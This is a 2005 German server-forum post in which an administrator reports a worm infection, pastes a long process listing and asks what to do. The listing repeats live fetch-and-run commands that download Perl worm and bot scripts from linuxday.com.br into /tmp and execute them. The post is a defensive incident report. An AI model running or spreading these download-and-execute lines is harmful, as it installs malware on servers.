Servercommunity Foren-Übersicht Servercommunity
Das informative Forum für Fragen rund um Server
 
 FAQFAQ   SuchenSuchen   MitgliederlisteMitgliederliste   BenutzergruppenBenutzergruppen   RegistrierenRegistrieren 
 ProfilProfil   Einloggen, um private Nachrichten zu lesenEinloggen, um private Nachrichten zu lesen   LoginLogin 

Wurm

 
Neues Thema eröffnen   Neue Antwort erstellen    Servercommunity Foren-Übersicht -> Security
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
Dennis
Junior-Chef


Anmeldedatum: 21.06.2003
Beiträge: 2344
Wohnort: Schömberg (zw. Stuttgart u . Karlsruhe)

BeitragVerfasst am: Fr Feb 18, 2005 10:36    Titel: Wurm Antworten mit Zitat

Ich habe auf meinem Server in letzter Zeit erhöhten Traffic festgestellt. So. Gerade eben habe ich mal ein wenig nachgesehen und festgestellt, dass sich ein Wurm auf der Kiste eingenistet hat:

Zitat:
web30 23942 20850 0 09:29 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24027 24025 0 09:34 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24031 24029 0 09:34 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24078 24075 0 09:37 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24083 24080 0 09:37 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24093 21445 0 09:38 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24097 19780 0 09:38 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24102 21439 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24105 20261 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24111 21381 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24115 19876 0 09:39 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24121 21520 0 09:39 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24125 22648 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24128 22662 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24133 21467 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24135 22669 0 09:39 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24148 24146 0 09:39 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24156 24153 0 09:40 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24218 24216 0 09:42 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24232 24230 0 09:42 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24238 24236 0 09:42 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24245 24243 0 09:43 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24276 19872 0 09:43 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24277 20002 0 09:43 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24327 20006 0 09:45 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24413 24410 0 09:49 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24419 19923 0 09:49 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24423 24421 0 09:49 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24432 22822 0 09:50 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24461 22875 0 09:51 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24465 21617 0 09:51 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24469 20162 0 09:51 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24473 20265 0 09:51 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24476 21613 0 09:51 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24483 21901 0 09:52 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24487 20069 0 09:52 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24492 21542 0 09:52 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24496 21356 0 09:52 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24502 20861 0 09:52 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24535 20052 0 09:56 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24542 21137 0 09:56 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24747 20170 0 10:00 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24750 21516 0 10:00 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24770 20225 0 10:02 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24798 21636 0 10:05 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24801 21649 0 10:05 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24805 21656 0 10:05 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24828 23320 0 10:07 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 24843 24841 0 10:07 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 24849 24847 0 10:08 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25009 21706 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25015 21660 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25019 21471 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25023 20188 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25027 22674 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25030 22866 0 10:10 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25034 22826 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25038 21385 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25041 20466 0 10:10 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25045 23433 0 10:10 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25048 21535 0 10:10 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25053 23411 0 10:11 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25057 21352 0 10:11 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25059 23307 0 10:11 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25071 21702 0 10:11 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25100 23489 0 10:12 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25116 25114 0 10:12 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25122 25120 0 10:13 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25140 23495 0 10:13 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25162 20180 0 10:14 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25172 21721 0 10:14 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25180 21782 0 10:15 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25221 25219 0 10:15 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25225 25223 0 10:15 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25258 23563 0 10:17 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25265 23567 0 10:17 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25297 25295 0 10:18 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25301 25299 0 10:18 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25316 20807 0 10:19 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25338 23640 0 10:21 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25342 23664 0 10:21 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25348 23685 0 10:21 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25355 22087 0 10:22 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25359 23689 0 10:22 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25391 25389 0 10:23 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25398 25396 0 10:23 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25432 23731 0 10:24 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25436 23735 0 10:24 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25458 23760 0 10:25 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25463 22095 0 10:25 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25466 21133 0 10:25 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25469 19776 0 10:25 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25472 21896 0 10:25 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25475 20800 0 10:25 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25479 23781 0 10:25 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25484 15537 0 10:26 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25517 23811 0 10:28 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25523 23815 0 10:28 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25526 20218 0 10:28 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25546 23860 0 10:29 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25580 23864 0 10:30 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25632 23882 0 10:31 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25640 23890 0 10:31 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected
web30 25652 15533 0 10:31 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25656 23908 0 10:31 ? 00:00:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
web30 25711 23912 0 10:32 ? 00:00:00 sh -c wget bot.linuxday.com.br -O /tmp/.linuxdaybot;perl /tmp/.linuxdaybot;touch /tmp/.linuxdayinfected


Da hat wohl ein Kunde nicht ordentlich gepatcht (evtl. phpbb). Ich habe den Kunden mal gesperrt und in /tmp die Perlscripte gelöscht. Weiß jemand was über diesen Wurm ? Was soll ich tun ?
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Website dieses Benutzers besuchen
Beiträge der letzten Zeit anzeigen:   
Neues Thema eröffnen   Neue Antwort erstellen    Servercommunity Foren-Übersicht -> Security Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 1

 
Gehe zu:  
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.



Powered by phpBB © 2001, 2005 phpBB Group
Deutsche Übersetzung von phpBB.de